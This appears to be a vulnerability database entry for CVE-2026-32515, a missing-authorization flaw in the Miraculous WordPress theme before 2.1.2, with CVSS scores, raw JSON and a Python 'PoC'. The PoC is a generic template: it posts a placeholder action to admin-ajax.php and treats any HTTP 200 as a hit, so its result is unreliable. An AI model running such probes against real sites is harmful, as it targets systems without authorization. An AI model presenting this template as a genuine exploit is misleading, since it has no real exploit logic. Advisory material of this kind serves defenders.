Security Vulnerability Report
中文
CVE-2026-32515 CVSS 7.5 HIGH

CVE-2026-32515

Published: 2026-03-25 17:17:04
Last Modified: 2026-04-29 10:17:18

Description

Missing Authorization vulnerability in kamleshyadav Miraculous miraculous allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Miraculous: from n/a through < 2.1.2.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Miraculous < 2.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Miraculous Theme < 2.1.2 - Missing Authorization (PoC) # Date: 2026-03-25 # CVE: CVE-2026-32515 # Target configuration target_url = "http://example.com" # The vulnerable endpoint is typically wp-admin/admin-ajax.php or a specific theme endpoint url = f"{target_url}/wp-admin/admin-ajax.php" # Payload data simulating the exploitation of missing authorization # The specific 'action' parameter depends on the theme's registered hooks payload = { "action": "vulnerable_miraculous_action", # Replace with actual action if known "data": "malicious_payload" } try: # Sending POST request without authentication cookies response = requests.post(url, data=payload, timeout=10) # Check if the request was processed (status 200 usually indicates execution) if response.status_code == 200: print("[+] Potential vulnerability detected!") print(f"[+] Server Response: {response.text[:200]}") else: print("[-] Request failed or vulnerability not present.") except requests.RequestException as e: print(f"[!] Error connecting to target: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32515", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:03.987", "lastModified": "2026-04-29T10:17:17.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in kamleshyadav Miraculous miraculous allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Miraculous: from n/a through < 2.1.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en kamleshyadav Miraculous miraculous permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Miraculous: desde n/a hasta &lt; 2.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/miraculous/vulnerability/wordpress-miraculous-theme-2-1-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}